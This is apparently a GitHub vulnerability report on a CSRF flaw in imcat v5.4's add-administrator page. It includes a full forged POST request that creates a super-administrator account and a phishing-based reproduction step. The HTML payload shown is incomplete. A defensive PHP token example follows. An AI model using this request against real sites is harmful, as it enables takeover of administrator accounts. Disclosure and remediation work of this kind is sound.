
CSRF vulnerability in imcat v5.4 #9

Open
@haungtongfu

Description


1. Overview

Official website: http://txjia.com/imcat/

Version: imcat-5.4

Vulnerability type: CSRF post

Source code: https://github.com/peacexie/imcat/releases/tag/v5.4

Impact: a super administrator account can be added

2. Analysis

2.1 Logic analysis

On the add-administrator page, the origin of the submitted data is verified neither by a token nor by the Referer header.

(1) There is no token in the request for security verification, so the request can be forged:
POST /imcat/root/run/adm.php?dops-a&mod=adminer&view=form&stype=& HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 539
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/imcat/root/run/adm.php?dops-a&mod=adminer&view=form&stype=&recbk=ref
Cookie: Hm_lvt_948dba1e5d873b9c1f1c77078c521c89=1622443371; CKFinder_Path=Files%3A%2F%3A1; v49_sessid_4294e52897e5=2021-6b-hg49-yttfxda8f-7e5f79d1a; v49_Uniqueid_01348a66d0e6=2021-6h-a25c-5s8pgxq58-0e63b0fe2; Hm_lpvt_948dba1e5d873b9c1f1c77078c521c89=1622444424; twVscAv_admauth=1606cECE916XO1gVfiR9ahqpqkEJMTxa4R5XjBOh69Cfppjn2zcpGMtx5x7BRkm4L0Vposdev%2B2ydGfzzC3me67ttA1foMK2UXNSybiOLOvH; v49_vcodes=fmadm%3Dnull%0Afmcomadd%3D1623809462%2C49f8c2fc48af351f%0Afmapply%3D1623830847%2C7da4f846fdbd0243%0A; v49_ocar_items=0; PHPSESSID=5b4be5ad4c47747257ac13a5c15265c9
Upgrade-Insecure-Requests: 1

recbk=http%3A%2F%2F127.0.0.1%2Fimcat%2Froot%2Frun%2Fadm.php%3Fdops-a%26mod%3Dadminer&fm%5Buid%5D=2021-6p-j6xk&fm%5Buno%5D=1&fm%5Buname%5D=qwe_123&fm%5Bupass%5D=adm_123&fm%5Bgrade%5D=supper&fm%5Bshow%5D=1&fm%5Bmname%5D=qwe_123&fm%5Bindep%5D=inadm&fm%5Bmiuid%5D=&fm%5Bmtel%5D=12345678091&fm%5Bmemail%5D=23wqw%4022.com&fm%5Bmaddr%5D=&fm%5Batime%5D=2021-06-21+17%3A14%3A49&fm%5Betime%5D=2021-06-21+17%3A14%3A49&fm%5Bauser%5D=adm_123&fm%5Beuser%5D=adm_123&fm%5Baip%5D=127.0.0.1&fm%5Beip%5D=127.0.0.1&bsend=%E6%8F%90%E4%BA%A4&mod=adminer&isadd=1

(2) After removing the Referer header, an administrator can still be added.

3. Vulnerability reproduction

(1) Environment preparation: the test environment is built with phpStudy.

(2) Construct a payload that creates a super administrator account, qwe_123/adm_123:

<script>history.pushState('', '', '/')</script>

(3) Lure the administrator into opening the page by some phishing means; this completes the action of adding a super administrator without the administrator's knowledge.

4. Verification of attack results

Log in to the back end with qwe_123/adm_123.

5. Means of Defense

Add a token check wherever important actions are performed. The token value must be random and unpredictable.
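As an added example (not imcat's own code), the following PHP shows both of the checks section 2.1 found missing and the token defense recommended above: a per-session synchronizer token that is generated from the CSPRNG, embedded in the form, and compared in constant time, plus an Origin/Referer check that fails closed when the header is absent. The field name `_csrf`, the session key, the allowed host `127.0.0.1` and the function names are assumptions, and the handler only stands in for the real add-administrator logic.

```php
<?php
// Added example: synchronizer-token CSRF protection for a privileged admin form.
// Not part of imcat; names, field and host values below are assumptions.
declare(strict_types=1);

const CSRF_FIELD       = '_csrf';        // hypothetical hidden form field name
const CSRF_SESSION_KEY = '_csrf_token';  // hypothetical session key
const ADMIN_HOST       = '127.0.0.1';    // assumed host of the admin interface

// Return the per-session token, creating it from the CSPRNG on first use.
// 32 random bytes (64 hex chars) cannot be guessed, unlike a timestamp or counter.
function csrf_token(): string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION[CSRF_SESSION_KEY])) {
        $_SESSION[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $_SESSION[CSRF_SESSION_KEY];
}

// Hidden field to place inside every form that performs a state-changing action.
function csrf_field(): string
{
    return '<input type="hidden" name="' . CSRF_FIELD . '" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Compare the submitted token with the session token in constant time.
function csrf_valid(array $post): bool
{
    $given = $post[CSRF_FIELD] ?? '';
    return is_string($given) && $given !== '' && hash_equals(csrf_token(), $given);
}

// Defense in depth: browsers attach Origin to cross-origin POSTs, so a foreign
// host is rejected. A missing Origin and Referer is also rejected, so simply
// stripping the header (section 2.1, point 2) does not bypass the check.
function same_origin_request(array $server, string $allowedHost): bool
{
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if (!is_string($source) || $source === '') {
        return false;
    }
    $host = parse_url($source, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $allowedHost) === 0;
}

// Stand-in for the adminer "form" action: every check runs before any database write.
function handle_add_admin(array $post, array $server): string
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return 'rejected: method not allowed';
    }
    if (!same_origin_request($server, ADMIN_HOST)) {
        return 'rejected: cross-site or missing Origin/Referer';
    }
    if (!csrf_valid($post)) {
        return 'rejected: missing or invalid CSRF token';
    }
    // The original insert of fm[uname], fm[upass], fm[grade] ... would run here.
    return 'ok: administrator created';
}

// Rendering side: the form for the privileged action carries the token.
function render_add_admin_form(): string
{
    return '<form method="post" action="adm.php?dops-a&mod=adminer&view=form">'
        . csrf_field()
        . '<input name="fm[uname]"><input name="fm[upass]" type="password">'
        . '<button name="bsend">submit</button></form>';
}
```

The Origin/Referer check on its own is not sufficient (both headers can be suppressed by the submitting page, as section 2.1 shows for Referer), which is why the token comparison is the check that actually decides; the header check only narrows what reaches it. A token that is stored in the session and compared with `hash_equals` cannot be read by the attacker's page, so a forged cross-site POST has no way to supply it.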
